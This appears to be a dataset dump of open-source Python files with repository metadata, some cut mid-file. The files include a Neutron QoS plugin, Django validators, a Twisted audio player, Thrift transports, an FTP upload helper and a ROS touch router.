rule = rule_object.QosBandwidthLimitRule(context)
rule.id = rule_id
rule.delete()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy_bandwidth_limit_rule(self, context, rule_id,
policy_id, fields=None):
# make sure we have access to the policy when fetching the rule
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule.get_by_id(
context, rule_id)
if not rule:
raise n_exc.QosRuleNotFound(policy_id=policy_id, rule_id=rule_id)
return rule
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy_bandwidth_limit_rules(self, context, policy_id,
filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False):
# make sure we have access to the policy when fetching rules
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
self._get_policy_obj(context, policy_id)
return rule_object.QosBandwidthLimitRule.get_objects(context,
**filters)
# TODO(QoS): enforce rule types when accessing rule objects
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_rule_types(self, context, filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False):
return rule_type_object.QosRuleType.get_objects(**filters)
|
vesta33/aa-test | MyClip.py | Python | gpl-2.0 | 212 | 0.023585 | __author__ = 'anastas | sias'
import os
#python MyClip.py kopeerib clipboardi programmi output
def addToClipBoard():
command = 'python Isikukood_new.py | clip'
| os.system(command)
#example
addToClipBoard() |
bczmufrn/frequencia | frequencia/calendario/models.py | Python | mit | 326 | 0.030675 | from django.db import models
from frequencia.core.base | model import basemodel
class FeriadoCalendarioAcademico(basemodel):
nome = models.CharField('Nome | ', max_length=100)
data = models.DateField('Data')
def __str__(self):
return self.nome
class Meta:
verbose_name = 'Feriado'
verbose_name_plural = 'Feriados'
|
petrushev/txplaya | txplaya/player.py | Python | gpl-3.0 | 13,214 | 0.001059 | from decimal import Decimal
from collections import deque
import gc
from uuid import uuid4
from operator import itemgetter
import json
from twisted.internet import reactor
from twisted.internet.task import deferLater
from twisted.python import log
from txplaya.library import Library
from txplaya.lastfm import getScrobbler
from txplaya.track import Track
ITER_TIME = 0.2
HISTORY_CHUNKS = 4
itemgetter0 = itemgetter(0)
def logErr(failure):
failure.printTraceback()
class TxPlayaError(Exception): pass
class PlaylistError(TxPlayaError): pass
class PlaylistFinished(PlaylistError): pass
class ListenerRegistry(object):
def __init__(self):
self._reg = {}
def add(self, listener):
self._reg[id(listener)] = listener
def remove(self, listener):
del self._reg[id(listener)]
def onPlaylistFinished(self):
log.msg('ListenerRegistry::onPlaylistFinished not implemented')
def iterListeners(self):
for listener in self._reg.itervalues():
yield listener
class Player(object):
playing = False
paused = False
data = deque()
history = deque()
currentSize = 0
def __init__(self):
self._garbageCollect()
def _garbageCollect(self):
_bytes = gc.collect()
if _bytes == 0:
interval = 3000
else:
interval = 1000
_d = deferLater(reactor, interval, self._garbageCollect)
#log.msg('Garbage collected %d' % bytes_)
def feed(self, track, clear=False):
if clear:
self.data.clear()
try:
chunks = track.dataChunks(ITER_TIME)
except IOError:
log.err('{0} can not be read'.format(repr(track)))
#self.onTrackFinished()
raise
else:
self.currentSize = sum(map(len, chunks))
self.data.extend(chunks)
def play(self):
if not self.playing or self.paused:
return
if len(self.data) == 0:
self.playing = False
self.currentSize = 0
self.onTrackFinished()
return
buf = self.data.popleft()
self.history.append(buf)
while len(self.history) > HISTORY_CHUNKS:
_ = self.history.popleft()
_d = deferLater(reactor, ITER_TIME, self.play)
_d.addErrback(logErr)
# push buffer to management
self.onPush(buf)
self._timerUpdate()
def _timerUpdate(self):
if self.currentSize == 0:
self.onTimerUpdate(0)
return
remainingSize = sum(map(len, self.data))
progressPercent = int((self.currentSize - remainingSize ) * 100.0 / self.currentSize)
# update timer
self.onTimerUpdate(progressPercent)
def start(self):
if len(self.data) == 0:
return
self.onStart()
if self.playing and not self.paused:
return
self.playing = True
self.paused = False
self.play()
def stop(self):
self.data = deque()
self.history = deque()
self.playing = False
self.paused = False
self.onStop()
def pause(self):
self.paused = True
self.onPaused(True)
def resume(self):
self.paused = False
self.play()
self.onPaused(False)
def onPush(self, buf):
log.err('Player not attached')
def onStart(self):
log.err('Player not attached')
def onTrackFinished(self):
log.err('Player not attached')
def onStop(self):
log.err('Player not attached')
def onTimerUpdate(self):
log.err('Player not attached')
def onPaused(self):
log.err('Player not attached')
class Playlist(object):
_reg = {}
_order = {}
_currentUid = None
_undos = deque()
_redos = deque()
def iterTrackUid(self):
keys = sorted(self._order.keys())
for dposition in keys:
trackUid = self._order[dposition]
yield trackUid
def iterTrack(self):
for trackUid in self.iterTrackUid():
yield self._reg[trackUid]
@property
def playlistData(self):
data = (track.meta for track in self.iterTrack())
data = [meta for meta in data if meta is not None]
return data
@property
def _paths(self):
return [track._path for track in self.iterTrack()]
def insert(self, track, position=None, emit=True):
if self._reg == {}:
dposition = Decimal(1)
elif position is None or position >= len(self._order):
dposition = max(self._order.keys()) + 1
elif position == 0:
dposition = min(self._order.keys()) / 2
else: # 0 < position < len_reg
keys = sorted(self._order.keys())
dposition = (keys[position - 1] + keys[position]) / 2
trackUid = uuid4()
self._reg[trackUid] = track
self._order[dposition] = trackUid
if emit:
self.onChanged()
def mark(self):
self._undos.append((dict(self._reg), dict(self._order)))
self._redos.clear()
def undo(self):
if not self.hasUndo:
return
self._redos.appendleft((dict(self._reg), dict(self._order)))
self._reg, self._order = self._undos.pop()
if self._currentUid not in self._reg:
self._currentUid = None
self.onChanged()
def redo(self):
if not self.hasRedo:
return
self._undos.append((dict(self._reg), dict(self._order)))
self._reg, self._order = self._redos.popleft()
if self._currentUid not in self._reg:
self._currentUid = None
self.onChanged()
@property
def hasUndo(self):
return len(self._undos) > 0
@property
def hasRedo(self):
return len(self._redos) > 0
def remove(self, position, emit=True):
keys = sorted(self._order.keys())
dposition = keys[position]
trackUid = self._order[dposition]
self.mark()
del self._order[dposition]
del self._reg[trackUid]
if trackUid == self._currentUid:
self._currentUid = None
if emit:
self.onChanged()
def move(self, origin, target, emit=True):
if origin == target or origin + 1 == target:
return
keys = sorted(self._order.keys())
dpositionOrigin = keys[origin]
trackUid = self._order[dpositionOrigin]
if target == 0:
dpositionTarget = keys[0] / 2
elif target >= len(self._order):
dpositionTarget = max(self._order.keys()) + 1
else:
dpositionTarget = (keys[target] + keys[target - 1]) / 2
self.mark()
del self._order[dpositionOrigin]
self._order[dpositionTarget] = trackUid
if emit:
self.onChanged()
def clear(self):
self.mark()
self._order.clear()
self._reg.clear()
self._currentUid = None
self.onChanged()
@property
def currentPosition(self):
if self._currentUid is None:
return None
keys = sorted(self._order.items(), key=itemgetter0)
for position, (_, trackUid) in enumerate(keys):
if trackUid == self._currentUid:
return position
raise PlaylistError, 'current uid not in _reg'
@property |
def currentTrack(self):
if self._currentUid is None:
return None
return self._reg[self._currentUid]
def start(self, position=None):
if self._reg == {}:
raise Playlis | tError, 'Empty playlist'
if position >= len(self._reg) or position < 0:
raise PlaylistError, 'Position out of bounds'
if position is None:
position = 0
keys = sorted(self._order.keys())
dposition = keys[position]
trackUid = self._order[dposition]
self._currentUid = trackUid
def stop(self):
self._currentUid = None
def stepNext(self):
position = self.currentPosition
if |
MounirMesselmeni/django | django/core/validators.py | Python | bsd-3-clause | 15,107 | 0.00278 | from __future__ import unicode_literals
import re
from django.core.exceptions import ValidationError
from django.utils import six
from django.utils.deconstruct import deconstructible
from django.utils.encoding import force_text
from django.utils.functional import SimpleLazyObject
from django.utils.ipv6 import is_valid_ipv6_address
from django.utils.six.moves.urllib.parse import urlsplit, urlunsplit
from django.utils.translation import ugettext_lazy as _, ungettext_lazy
# These values, if given to validate(), will trigger the self.required check.
EMPTY_VALUES = (None, '', [], (), {})
def _lazy_re_compile(regex, flags=0):
"""Lazily compile a regex with flags."""
def _compile():
# Compile the regex if it was not passed pre-compiled.
if isinstance(regex, six.string_types):
return re.compile(regex, flags)
else:
assert not flags, "flags must be empty if regex is passed pre-compiled"
return regex
return SimpleLazyObject(_compile)
@deconstructible
class RegexValidator(object):
regex = ''
message = _('Enter a valid value.')
code = 'invalid'
inverse_match = False
flags = 0
def __init__(self, regex=None, message=None, code=None, inverse_match=None, flags=None):
if regex is not None:
self.regex = regex
if message is not None:
self.message = message
if code is not None:
self.code = code
if inverse_match is not None:
self.inverse_match = inverse_match
if flags is not None:
self.flags = flags
if self.flags and not isinstance(self.regex, six.string_types):
raise TypeError("If the flags are set, regex must be a regular expression string.")
self.regex = _lazy_re_compile(self.regex, self.flags)
def __call__(self, value):
"""
Validates that the input matches the regular expression
if inverse_match is False, otherwise raises ValidationError.
"""
if not (self.inverse_match is not bool(self.regex.search(
force_text(value)))):
raise ValidationError(self.message, code=self.code)
def __eq__(self, other):
return (
isinstance(other, RegexValidator) and
self.regex.pattern == other.regex.pattern and
self.regex.flags == other.regex.flags and
(self.message == other.message) and
(self.code == other.code) and
(self.inverse_match == other.inverse_match)
)
def __ne__(self, other):
return not (self == other)
@deconstructible
class URLValidator(RegexValidator):
ul = '\u00a1-\uffff' # unicode letters range (must be a unicode string, not a raw string)
# IP patterns
ipv4_re = r'(?:25[0-5]|2[0-4]\d|[0-1]?\d?\d)(?:\.(?:25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}'
ipv6_re = r'\[[0-9a-f:\.]+\]' # (simple regex, validated later)
# Host patterns
hostname_re = r'[a-z' + ul + r'0-9](?:[a-z' + ul + r'0-9-]*[a-z' + ul + r'0-9])?'
domain_re = r'(?:\.(?!-)[a-z' + ul + r'0-9-]+(?<!-))*'
tld_re = r'\.(?:[a-z' + ul + r']{2,}|xn--[a-z0-9]+)\.?'
host_re = '(' + hostname_re + domain_re + tld_re + '|localhost)'
regex = _lazy_re_compile(
r'^(?:[a-z0-9\.\-\+]*)://' # scheme is validated separately
r'(?:\S+(?::\S*)?@)?' # user:pass authentication
r'(?:' + ipv4_re + '|' + ipv6_re + '|' + host_re + ')'
r'(?::\d{2,5})?' # port
r'(?:[/?#][^\s]*)?' # resource path
r'\Z', re.IGNORECASE)
message = _('Enter a valid URL.')
schemes = ['http', 'https', 'ftp', 'ftps']
def __init__(self, schemes=None, **kwargs):
super(URLValidator, self).__init__(**kwargs)
if schemes is not None:
self.schemes = schemes
def __call__(self, value):
value = force_text(value)
# Check first if the scheme is valid
scheme = value.split('://')[0].lower()
if scheme not in self.schemes:
raise ValidationError(self.message, code=self.code)
# Then check full URL
try:
super(URLValidator, self).__call__(value)
except ValidationError as e:
# Trivial case failed. Try for possible IDN domain
if value:
scheme, netloc, path, query, fragment = urlsplit(value)
try:
netloc = netloc.encode('idna').decode('ascii') # IDN -> ACE
except UnicodeError: # invalid domain part
raise e
url = urlunsplit((scheme, netloc, path, query, fragment))
super(URLValidator, self).__call__(url)
else:
raise
else:
# Now verify IPv6 in the netloc part
host_match = re.search(r'^\[(.+)\](?::\d{2,5})?$', urlsplit(value).netloc)
if host_match:
potential_ip = host_match.groups()[0]
try:
validate_ipv6_address(potential_ip)
except ValidationError:
raise ValidationError(self.message, | code=self.code)
url = value
integer_validator = RegexValidator(
_lazy_re_compile('^-?\d+\Z'),
message=_('Enter a valid integer.'),
code='invalid',
)
def validate_integer(value):
return integer_validator(value)
@deconstructible
class EmailValidator(object):
message = _('Enter a valid email address.')
code = 'invalid'
user_regex = _lazy_re_compile(
| r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*\Z" # dot-atom
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-\011\013\014\016-\177])*"\Z)', # quoted-string
re.IGNORECASE)
domain_regex = _lazy_re_compile(
# max length for domain name labels is 63 characters per RFC 1034
r'((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+)(?:[A-Z0-9-]{2,63}(?<!-))\Z',
re.IGNORECASE)
literal_regex = _lazy_re_compile(
# literal form, ipv4 or ipv6 address (SMTP 4.1.3)
r'\[([A-f0-9:\.]+)\]\Z',
re.IGNORECASE)
domain_whitelist = ['localhost']
def __init__(self, message=None, code=None, whitelist=None):
if message is not None:
self.message = message
if code is not None:
self.code = code
if whitelist is not None:
self.domain_whitelist = whitelist
def __call__(self, value):
value = force_text(value)
if not value or '@' not in value:
raise ValidationError(self.message, code=self.code)
user_part, domain_part = value.rsplit('@', 1)
if not self.user_regex.match(user_part):
raise ValidationError(self.message, code=self.code)
if (domain_part not in self.domain_whitelist and
not self.validate_domain_part(domain_part)):
# Try for possible IDN domain-part
try:
domain_part = domain_part.encode('idna').decode('ascii')
if self.validate_domain_part(domain_part):
return
except UnicodeError:
pass
raise ValidationError(self.message, code=self.code)
def validate_domain_part(self, domain_part):
if self.domain_regex.match(domain_part):
return True
literal_match = self.literal_regex.match(domain_part)
if literal_match:
ip_address = literal_match.group(1)
try:
validate_ipv46_address(ip_address)
return True
except ValidationError:
pass
return False
def __eq__(self, other):
return (
isinstance(other, EmailValidator) and
(self.domain_whitelist == other.domain_whitelist) and
(self.message == other.message) and
(self.code == other.code)
)
validate_email = EmailValidator()
slug_re = _lazy_re_compile(r'^[-a-zA-Z0-9_]+\Z')
validate_slug = RegexValidator(
slug_re,
_("Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens."),
'invalid'
)
slug_uni |
plotly/plotly.py | packages/python/plotly/plotly/validators/funnel/marker/colorbar/_bgcolor.py | Python | mit | 429 | 0.002331 | import _ | plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="funnel.marker.colorbar", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
| **kwargs
)
|
onlyjus/pyqtgraph | pyqtgraph/opengl/GLViewWidget.py | Python | mit | 18,189 | 0.009071 | from ..Qt import QtCore, QtGui, QtOpenGL, USE_PYQT5
from OpenGL.GL import *
import OpenGL.GL.framebufferobjects as glfbo
import numpy as np
from .. import Vector
from .. import functions as fn
##Vector = QtGui.QVector3D
ShareWidget = None
class GLViewWidget(QtOpenGL.QGLWidget):
"""
Basic widget for displaying 3D data
- Rotation/scale controls
- Axis/grid display
- Export options
"""
def __init__(self, parent=None):
global ShareWidget
if ShareWidget is None:
## create a dummy widget to allow sharing objects (textures, shaders, etc) between views
ShareWidget = QtOpenGL.QGLWidget()
QtOpenGL.QGLWidget.__init__(self, parent, ShareWidget)
self.setFocusPolicy(QtCore.Qt.ClickFocus)
self.opts = {
'center': Vector(0,0,0), ## will always appear at the center of the widget
'distance': 10.0, ## distance of camera from center
'fov': 60, ## horizontal field of view in degrees
'elevation': 30, ## camera's angle of elevation in degrees
'azimuth': 45, ## camera's azimuthal angle in degrees
## (rotation around z-axis 0 points along x-axis)
'viewport': None, ## glViewport params; None == whole widget
}
self.setBackgroundColor('k')
self.items = []
self.noRepeatKeys = [QtCore.Qt.Key_Right, QtCore.Qt.Key_Left, QtCore.Qt.Key_Up, QtCore.Qt.Key_Down, QtCore.Qt.Key_PageUp, QtCore.Qt.Key_PageDown]
self.keysPressed = {}
self.keyTimer = QtCore.QTimer()
self.keyTimer.timeout.connect(self.evalKeyState)
self.makeCurrent()
def addItem(self, item):
self.items.append(item)
if hasattr(item, 'initializeGL'):
self.makeCurrent()
try:
item.initializeGL()
except:
self.checkOpenGLVersion('Error while adding item %s to GLViewWidget.' % str(item))
item._setView(self)
#print "set view", item, self, item.view()
self.update()
def removeIte | m(self, item):
self.items.remove(item)
item._setView(None)
self.update()
def | initializeGL(self):
self.resizeGL(self.width(), self.height())
def setBackgroundColor(self, *args, **kwds):
"""
Set the background color of the widget. Accepts the same arguments as
pg.mkColor().
"""
self.opts['bgcolor'] = fn.mkColor(*args, **kwds)
self.update()
def getViewport(self):
vp = self.opts['viewport']
if vp is None:
return (0, 0, self.width(), self.height())
else:
return vp
def resizeGL(self, w, h):
pass
#glViewport(*self.getViewport())
#self.update()
def setProjection(self, region=None):
m = self.projectionMatrix(region)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
a = np.array(m.copyDataTo()).reshape((4,4))
glMultMatrixf(a.transpose())
def projectionMatrix(self, region=None):
# Xw = (Xnd + 1) * width/2 + X
if region is None:
region = (0, 0, self.width(), self.height())
x0, y0, w, h = self.getViewport()
dist = self.opts['distance']
fov = self.opts['fov']
nearClip = dist * 0.001
farClip = dist * 1000.
r = nearClip * np.tan(fov * 0.5 * np.pi / 180.)
t = r * h / w
# convert screen coordinates (region) to normalized device coordinates
# Xnd = (Xw - X0) * 2/width - 1
## Note that X0 and width in these equations must be the values used in viewport
left = r * ((region[0]-x0) * (2.0/w) - 1)
right = r * ((region[0]+region[2]-x0) * (2.0/w) - 1)
bottom = t * ((region[1]-y0) * (2.0/h) - 1)
top = t * ((region[1]+region[3]-y0) * (2.0/h) - 1)
tr = QtGui.QMatrix4x4()
tr.frustum(left, right, bottom, top, nearClip, farClip)
return tr
def setModelview(self):
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
m = self.viewMatrix()
a = np.array(m.copyDataTo()).reshape((4,4))
glMultMatrixf(a.transpose())
def viewMatrix(self):
tr = QtGui.QMatrix4x4()
tr.translate( 0.0, 0.0, -self.opts['distance'])
tr.rotate(self.opts['elevation']-90, 1, 0, 0)
tr.rotate(self.opts['azimuth']+90, 0, 0, -1)
center = self.opts['center']
tr.translate(-center.x(), -center.y(), -center.z())
return tr
def itemsAt(self, region=None):
"""
Return a list of the items displayed in the region (x, y, w, h)
relative to the widget.
"""
region = (region[0], self.height()-(region[1]+region[3]), region[2], region[3])
#buf = np.zeros(100000, dtype=np.uint)
buf = glSelectBuffer(100000)
try:
glRenderMode(GL_SELECT)
glInitNames()
glPushName(0)
self._itemNames = {}
self.paintGL(region=region, useItemNames=True)
finally:
hits = glRenderMode(GL_RENDER)
items = [(h.near, h.names[0]) for h in hits]
items.sort(key=lambda i: i[0])
return [self._itemNames[i[1]] for i in items]
def paintGL(self, region=None, viewport=None, useItemNames=False):
"""
viewport specifies the arguments to glViewport. If None, then we use self.opts['viewport']
region specifies the sub-region of self.opts['viewport'] that should be rendered.
Note that we may use viewport != self.opts['viewport'] when exporting.
"""
if viewport is None:
glViewport(*self.getViewport())
else:
glViewport(*viewport)
self.setProjection(region=region)
self.setModelview()
bgcolor = self.opts['bgcolor']
glClearColor(bgcolor.red(), bgcolor.green(), bgcolor.blue(), 1.0)
glClear( GL_DEPTH_BUFFER_BIT | GL_COLOR_BUFFER_BIT )
self.drawItemTree(useItemNames=useItemNames)
def drawItemTree(self, item=None, useItemNames=False):
if item is None:
items = [x for x in self.items if x.parentItem() is None]
else:
items = item.childItems()
items.append(item)
items.sort(key=lambda a: a.depthValue())
for i in items:
if not i.visible():
continue
if i is item:
try:
glPushAttrib(GL_ALL_ATTRIB_BITS)
if useItemNames:
glLoadName(i._id)
self._itemNames[i._id] = i
i.paint()
except:
from .. import debug
debug.printExc()
msg = "Error while drawing item %s." % str(item)
ver = glGetString(GL_VERSION)
if ver is not None:
ver = ver.split()[0]
if int(ver.split(b'.')[0]) < 2:
print(msg + " The original exception is printed above; however, pyqtgraph requires OpenGL version 2.0 or greater for many of its 3D features and your OpenGL version is %s. Installing updated display drivers may resolve this issue." % ver)
else:
print(msg)
finally:
glPopAttrib()
else:
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
try:
tr = i.transform()
a = np.array(tr.copyDataTo()).reshape((4,4))
glMultMatrixf(a.transpose())
self.drawItemTree(i, useItemNames=useItemNames)
finally:
glMatrixMode(GL_MODELVIEW)
|
traceguide/api-php | vendor/apache/thrift/lib/py/src/transport/TTransport.py | Python | mit | 11,455 | 0.011349 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from cStringIO import StringIO
from struct import pack, unpack
from thrift.Thrift import TException
class TTransportException(TException):
"""Custom Transport Exception class"""
UNKNOWN = 0
NOT_OPEN = 1
ALREADY_OPEN = 2
TIMED_OUT = 3
END_OF_FILE = 4
def __init__(self, type=UNKNOWN, message=None):
TException.__init__(self, message)
self.type = type
class TTransportBase:
"""Base class for Thrift transport layer."""
def isOpen(self):
pass
def open(self):
pass
def close(self):
pass
def read(self, sz):
pass
def readAll(self, sz):
buff = ''
have = 0
while (have < sz):
chunk = self.read(sz - have)
have += len(chunk)
buff += chunk
if len(chunk) == 0:
raise EOFError()
return buff
def write(self, buf):
pass
def flush(self):
pass
# This class should be thought of as an interface.
class CReadableTransport:
"""base class for transports that are readable from C"""
# TODO(dreiss): Think about changing this interface to allow us to use
# a (Python, not c) StringIO instead, because it allows
# you to write after reading.
# NOTE: This is a classic class, so properties will NOT work
# correctly for setting.
@property
def cstringio_buf(self):
"""A cStringIO buffer that contains the current chunk we are reading."""
pass
def cstringio_refill(self, partialread, reqlen):
"""Refills cstringio_buf.
Returns the currently used buffer (which can but need not be the same as
the old cstringio_buf). partialread is what the C code has read from the
buffer, and should be inserted into the buffer before any more reads. The
return value must be a new, not borrowed reference. Something along the
lines of self._buf should be fine.
If reqlen bytes can't be read, throw EOFError.
"""
pass
class TServerTransportBase:
"""Base class for Thrift server transports."""
def listen(self):
pass
def accept(self):
pass
def close(self):
pass
class TTransportFactoryBase:
"""Base class for a Tran | sport Factory"""
def getTransport(self, trans):
return trans
class TBufferedTransportFactory:
"""Factory transport that builds buffered transports"""
def getTransport(self, trans):
buffered = TBufferedTransport(trans)
return buffered
class TBuffere | dTransport(TTransportBase, CReadableTransport):
"""Class that wraps another transport and buffers its I/O.
The implementation uses a (configurable) fixed-size read buffer
but buffers all writes until a flush is performed.
"""
DEFAULT_BUFFER = 4096
def __init__(self, trans, rbuf_size=DEFAULT_BUFFER):
self.__trans = trans
self.__wbuf = StringIO()
self.__rbuf = StringIO("")
self.__rbuf_size = rbuf_size
def isOpen(self):
return self.__trans.isOpen()
def open(self):
return self.__trans.open()
def close(self):
return self.__trans.close()
def read(self, sz):
ret = self.__rbuf.read(sz)
if len(ret) != 0:
return ret
self.__rbuf = StringIO(self.__trans.read(max(sz, self.__rbuf_size)))
return self.__rbuf.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def flush(self):
out = self.__wbuf.getvalue()
# reset wbuf before write/flush to preserve state on underlying failure
self.__wbuf = StringIO()
self.__trans.write(out)
self.__trans.flush()
# Implement the CReadableTransport interface.
@property
def cstringio_buf(self):
return self.__rbuf
def cstringio_refill(self, partialread, reqlen):
retstring = partialread
if reqlen < self.__rbuf_size:
# try to make a read of as much as we can.
retstring += self.__trans.read(self.__rbuf_size)
# but make sure we do read reqlen bytes.
if len(retstring) < reqlen:
retstring += self.__trans.readAll(reqlen - len(retstring))
self.__rbuf = StringIO(retstring)
return self.__rbuf
class TMemoryBuffer(TTransportBase, CReadableTransport):
"""Wraps a cStringIO object as a TTransport.
NOTE: Unlike the C++ version of this class, you cannot write to it
then immediately read from it. If you want to read from a
TMemoryBuffer, you must either pass a string to the constructor.
TODO(dreiss): Make this work like the C++ version.
"""
def __init__(self, value=None):
"""value -- a value to read from for stringio
If value is set, this will be a transport for reading,
otherwise, it is for writing"""
if value is not None:
self._buffer = StringIO(value)
else:
self._buffer = StringIO()
def isOpen(self):
return not self._buffer.closed
def open(self):
pass
def close(self):
self._buffer.close()
def read(self, sz):
return self._buffer.read(sz)
def write(self, buf):
self._buffer.write(buf)
def flush(self):
pass
def getvalue(self):
return self._buffer.getvalue()
# Implement the CReadableTransport interface.
@property
def cstringio_buf(self):
return self._buffer
def cstringio_refill(self, partialread, reqlen):
# only one shot at reading...
raise EOFError()
class TFramedTransportFactory:
"""Factory transport that builds framed transports"""
def getTransport(self, trans):
framed = TFramedTransport(trans)
return framed
class TFramedTransport(TTransportBase, CReadableTransport):
"""Class that wraps another transport and frames its I/O when writing."""
def __init__(self, trans,):
self.__trans = trans
self.__rbuf = StringIO()
self.__wbuf = StringIO()
def isOpen(self):
return self.__trans.isOpen()
def open(self):
return self.__trans.open()
def close(self):
return self.__trans.close()
def read(self, sz):
ret = self.__rbuf.read(sz)
if len(ret) != 0:
return ret
self.readFrame()
return self.__rbuf.read(sz)
def readFrame(self):
buff = self.__trans.readAll(4)
sz, = unpack('!i', buff)
self.__rbuf = StringIO(self.__trans.readAll(sz))
def write(self, buf):
self.__wbuf.write(buf)
def flush(self):
wout = self.__wbuf.getvalue()
wsz = len(wout)
# reset wbuf before write/flush to preserve state on underlying failure
self.__wbuf = StringIO()
# N.B.: Doing this string concatenation is WAY cheaper than making
# two separate calls to the underlying socket object. Socket writes in
# Python turn out to be REALLY expensive, but it seems to do a pretty
# good job of managing string buffer operations without excessive copies
buf = pack("!i", wsz) + wout
self.__trans.write(buf)
self.__trans.flush()
# Implement the CReadableTransport interface.
@property
def cstringio_buf(self):
return self.__rbuf
def cstringio_refill(self, prefix, reqlen):
# self.__rbuf will already be empty here because fastbinary doesn't
# ask for a refill until the previous buffer is empty. Therefore,
# we can start reading new frames immediately.
while len(prefix) < reqlen:
self.readFrame()
prefix += self.__rbuf.getvalue()
self.__rbuf = StringIO(prefix)
return self.__rbuf
class TFileObjectTransport(TTransportBase):
"""Wraps a file-like object to make it work as a Thrift transport."""
def __init__(self, fileobj):
self.fileobj = fileobj
def isOpen(self):
return |
jptrosclair/webpush | src/ftpstore.py | Python | unlicense | 2,104 | 0.001426 | import ftplib
import os
import datastore
class FtpStore(datastore.DataStore):
def progress(self, block):
self.trans_total += len(block)
datastore.DataStore.progress(self, self.trans_total, self.file_size_total)
def exists(self, file):
if file == "" or file == "/" or file == "./":
return
try:
for f in self.ftp.nlst(os.path.dirname(file)):
| if f == os.path.basename(file):
return True
except ftplib.error_perm:
pass
return False
def makedirs(self, path):
if path == "" or | path == "/" or path == "./":
return
if not self.exists(os.path.dirname(path)):
self.makedirs(os.path.dirname(path))
if not self.exists(path):
self.ftp.mkd(path)
def store(self, file):
self.time = None
if self.exists(file):
self.remove(file)
elif not self.exists(os.path.dirname(file)):
self.makedirs(os.path.dirname(file))
self.file_size_total = os.path.getsize(file)
self.trans_total = 0
with open(file, "rb") as fh:
self.ftp.storbinary("STOR " + file, fh, 8192, self.progress)
def remove(self, file):
if self.exists(file):
self.ftp.delete(file)
def remove_dir(self, dir):
if self.exists(dir):
self.ftp.rmd(dir)
def __init__(self, synchost):
datastore.DataStore.__init__(self, synchost)
if self.synchost.scheme == "ftp":
self.ftp = ftplib.FTP()
elif self.synchost.scheme == "ftps":
self.ftp = ftplib.FTP_TLS()
self.ftp.connect(self.synchost.host, self.synchost.port)
if self.synchost.scheme == "ftps":
self.ftp.auth()
self.ftp.login(self.synchost.username, self.synchost.password)
if self.synchost.scheme == "ftps":
self.ftp.prot_p()
if not self.exists(self.synchost.path):
self.makedirs(self.synchost.path)
self.ftp.cwd(self.synchost.path) |
danielnyga/pracmln | python2/pracmln/__init__.py | Python | bsd-2-clause | 1,458 | 0 | # (C) 2012-2015 by Daniel Nyga
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN | ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mln.base import MLN
from mln.database import Database
from mln.constants import *
from mlnlearn import MLNLearn
from mlnlearn import MLNLearn as learn
from mlnquery import MLNQuery
from mlnquery import MLNQuery as query
fr | om mlnlearn import QUERY_PREDS
from mlnlearn import EVIDENCE_PREDS
from utils.project import mlnpath
from utils.project import PRACMLNConfig
|
EndPointCorp/lg_ros_nodes | lg_mirror/scripts/touch_router_node.py | Python | apache-2.0 | 1,992 | 0.002008 | #!/usr/bin/env python3
from functools import partial
import rospy
import sys
from lg_mirror.touch_router import TouchRouter
from lg_common.helpers import on_new_scene, load_director_message
from lg_msg_defs.msg import EvdevEvents, RoutedEvdevEvents, StringArray
from lg_common.helpers import handle_initial_state
from lg_mirror.touch_router import SubscribeListener
from lg_msg_defs.srv import TouchRoutes
from lg_common.helpers import run_with_influx_exception_handler
from std_msgs.msg import Bool
NODE_NAME = 'lg_mirror_router'
def main():
rospy.init_node(NODE_NAME)
default_viewport = rospy.get_param('~default_viewport', None)
device_id = rospy.get_param('~device_id', 'default')
event_pub = rospy.Publisher(f'/lg_mirror/{device_id}/routed_events', RoutedEvdevEvents, queue_size=100)
